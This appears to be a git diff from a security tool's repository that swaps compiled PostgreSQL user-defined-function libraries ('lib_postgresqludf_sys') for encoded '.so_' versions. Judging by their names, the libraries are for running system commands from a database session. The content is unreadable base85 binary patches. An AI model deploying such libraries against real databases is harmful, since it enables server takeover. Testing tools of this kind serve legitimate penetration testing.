zvh)!u^%tQN$2{==Lp{J@ilZcP+tDI%y}<Q;3T{^(?gDTZK4siJz%j=h*ZkiTaDC9_
zc$Az+Cs>Zl_t-AHU-KN5L>&1Qu*C6<JO&)kM@bU*8X6>y=hPYC=#wP%pQ3@|bAJ35
h?*;CY@^T1%#*;+c52OJpeR53c>cB?*g*5VT{{~4_i01$R

diff --git a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..a194bcb45a103695fe22196f889a4177d98d99c3
GIT binary patch
literal 2452
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
S*B$SGaP=rG@cwi*Dv0Oq>dlJ)

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so
deleted file mode 100755
index eb20b094ea800ff0b7fdcc3d4180b3cd722154ba..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 5124
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

diff --git a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..13a55a36762fffda5baa5f97b05e911b5a3369b3
GIT binary patch
literal 2450
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
Q1b73e?~lX#P_f{IsF_By{{R30

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so
deleted file mode 100755
index 9e07a823ff4a214207fe18001adfa3f663a67c26..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 5132
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

diff --git a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..c87247f8e44c77fa15c6f69790deee4234012b1f
GIT binary patch
literal 2452
zcmV;F32XKToW&;s6KmIQ00be-9?s?up=VEyb}=;6_Jndapot|M`(Hk9W^;Msn$7vV
z=ex@S4!bx{dUd_f1xB4UJpMP;v|W9rS2b@nH+pL>(>xfc+|+<1CRK{8U6Nc0CG*ie
zi^~Za->kg}jOYL&6#N8C^V<gR&A!k3fdut+K5v-$<iTJS{RzgFe<??~0(MjwT_ngE
zvu#Pr<}e6emo}(>AWstWxY)tqd&yY8a^r))0AZJ5#(Mo-$lB`_RGZ*V{V;$7V#I!Z
z%^UN{z8|D;{Fyr^fAUI@nWO-Eq>#$fKjwl%G5TzT(>@s<|31n;S%U+W157{WfNPT>
zbuB?IgHkYd<NeM6d(Zl7fy|?_44m&yG}-)NEIy_~Th<fC^MV4xBQjb0WN4@Tti!?5
zoeJEC0>wkR+SZq1^`BA!C`BX#`r7M66x;x1tlF}^GbIcX{;Kz2|2oy%2%7q~5ml}5
z&#gt3z9uX6y8prFDE=XoQUj;A?U_^{jIY0pWtka65U0uhLefBA{Y;VT)s{ZywDfMD
z4UiCw(^QDC+s5A@Ir>qG|0LoWHvd`qw{;^RG5P}XFkQWf{L?m{H1P_GC_4O6(j25P
zTK-xE|7H0~(%)G9SH)CbzKi^&<i|%xNvp`efa1Rz=|JWfa>zt1_$N??k<fS8cx<GB
z3qT)!=wOrXg$F3h%=ZxL^`Q493wH3hTHY{!|8>eef$JnbKoao)arjYJG&bKyQQmRD
zkAc6R{MhC~3GPsaF8esZGVuOI^5Y}(Xqo|d`%(7UE#HrS&m;?3HWJ|%J1r|PBb8fO
zdR=~%HbH+62Db#T=yrMu$TKCiG9_5IdTT0<*M>uiT~w^TGIa#neId!0hzBODa@oG9
zq_k9$ydq%`+2(eQwX}O(AW8atUPe&_CDGbdt1geCHLYPvZW+E8{Azh?5KH15;jmc7
zYf549#@gAdo`7X^v`w!-QN`4_q&ZqD-mV>)g+ie()XOts0wKT0;6B8dV;(^|mLMKM
zDshFF&t!^KP4n?-XAxIrZUYjss<3BRKTIn|%pE_JCRfnn3RW)H(=(ExsbM!Fi=yzP
zf>zSXDXsybrYWioD!OTplxU45X08neTvQL9<<B``{#a$Jq40=68|1NS!sz;^Lur_T
zRG6O=&Oe}U>n=8*5$H*_o94?<r|?4JSK)Ys7<aRTAZrhtL6zebc*mYij-P+ed4uu+
